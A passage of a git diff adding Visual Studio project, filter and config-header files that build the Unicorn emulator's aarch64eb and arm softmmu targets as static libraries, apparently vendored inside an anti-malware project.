<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64eb.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64eb.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64eb.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>aarch64eb.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj.filters new file mode 100644 index 0000000..39d22d5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/aarch64eb-softmmu.vcxproj.filters @@ -0,0 +1,149 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{4988fbf5-a5f0-4aaa-b301-8292e3bb6df7}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{ea984014-3856-4951-aa11-ed7d98e7d749}</UniqueIdentifier> + </Filter> + <Filter Include="hw\arm"> + <UniqueIdentifier>{fac9d0b8-8064-4486-bc54-0a63831fae99}</UniqueIdentifier> + </Filter> + <Filter Include="target-arm"> + <UniqueIdentifier>{8bb5cb48-4c00-419c-9ec9-7fa2829dd28e}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{4667e883-fc0e-4fc8-afad-b8f471736a96}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{d2c6525e-91e8-4b37-bd22-c07aa4058f1d}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper-a64.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + <ClInclude Include="..\..\..\qemu\aarch64eb.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c"> + <Filter>hw\arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\cpu64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper-a64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate-a64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_aarch64.c"> + <Filter>target-arm</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/config-target.h new file mode 100644 index 0000000..8baffa3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/aarch64eb-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_AARCH64 1 +#define TARGET_NAME "aarch64eb" +#define TARGET_ARM 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj new file mode 100644 index 0000000..cb905f3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj @@ -0,0 +1,235 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\kvm-consts.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\op_addsub.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\translate.h" /> + <ClInclude Include="..\..\..\qemu\target-arm\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\arm.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\tosa.c" /> + <ClCompile Include="..\..\..\qemu\hw\arm\virt.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\crypto_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\iwmmxt_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\neon_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\psci.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-arm\unicorn_arm.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{F67EB1EA-DCFA-4758-A2AA-4B570BA78036}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>armsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>arm.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>arm.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>arm.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-arm;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>arm.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj.filters new file mode 100644 index 0000000..157e6e6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/arm-softmmu/arm-softmmu.vcxproj.filters @@ -0,0 +1,137 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{c29e2ed5-3ecd-426d-9245-04de2c8ce754}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{89b122b1-9e4c-41b1-8670-c6d9ee3716f6}</UniqueIdentifier> + </Filter> + <Filter Include="hw\arm"> + <UniqueIdentifier>{76f837ed-af45-43bf-9ee7-193dbdec1cd5}</UniqueIdentifier> + </Filter> + <Filter Include="target-arm"> + <UniqueIdentifier>{1f03d4ae-6433-4037-a347-993db1a315e6}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{a9187bf5-cd27-47c7-8add-55b11a1150a9}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{015b3e43-eb63-4add-9f53-f3ac3033472f}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\arm_ldst.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\cpu-qom.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\helper.h"> + <Filter>target-arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-arm\internals.h"> + 